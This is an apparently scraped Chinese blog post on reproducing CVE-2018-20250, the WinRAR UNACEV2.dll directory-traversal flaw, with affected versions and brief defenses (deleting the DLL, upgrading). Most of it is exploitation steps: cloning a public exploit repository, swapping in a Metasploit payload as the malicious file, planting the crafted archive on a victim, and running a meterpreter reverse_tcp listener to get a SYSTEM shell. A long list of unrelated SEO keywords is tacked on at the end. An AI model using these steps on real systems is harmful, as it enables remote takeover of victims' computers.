WinRAR目录穿越漏洞
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE
千家信息网最后更新 2025年12月02日WinRAR目录穿越漏洞
复现环境
https://github.com/WyAtu/CVE-2018-20250/ 
复现过程

漏洞防御
该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行
漏洞编号: CVE-2018-20250
影响版本:
WinRAR < 5.70 Beta 1
Bandizip < = 6.2.0.0
好压(2345压缩) < = 5.9.8.10907
360压缩 < = 4.0.0.1170


exp下载:

1.使用Metasploit生成Payload
2.使用exp生成恶意程序
cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py
将exp.py中的evil_filename = "calc.exe"改为"WinRAR.exe"
将CVE-2018-20250文件夹复制到Windows10中执行
3.在靶机上运行恶意程序
将test.rar 投放到win8上 解压运行
4.在kali上监听metasploit
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com
5.控制靶机
Win8重启之后 kali会接受到会话 此时执行shell
进入到win8系统的system权限

1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御
2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1
3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本
漏洞
文件
动态
服务器
版本
过程
链接
服务
目录
恶意
程序
靶机
处理
影响
生成
运行
防御
有效
陈旧
代码
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
服务器投影仪无信号源蓝屏
上海大梦数据库软件测试工程师
非通用语数据库
.net 服务器运行失败
国征互联网科技客服
关闭服务器的ssl证书验证
数据库为什么要分层
网络技术有限公司的名称
数据库表项意义
软件开发过程与测试的关系
数据库删除以后怎么恢复
网络安全至关重要 分为
爆破服务器的sql
自己建立数据库集群
服务器管理员怎么查看密码
深圳市卓逸网络技术有限公司
美创网络安全产业链
网络安全意识教育问题
报名数据库
网络安全话题正文
空间数据库 试题
汽车车载网络技术期末试卷
无锡生态软件开发节能标准
数据库获取一条记录
网站服务器管理权限是什么
软件开发敏捷模式
抵押车软件开发
网络安全类厂商
小企业服务器硬件
ajax栅格数据库图片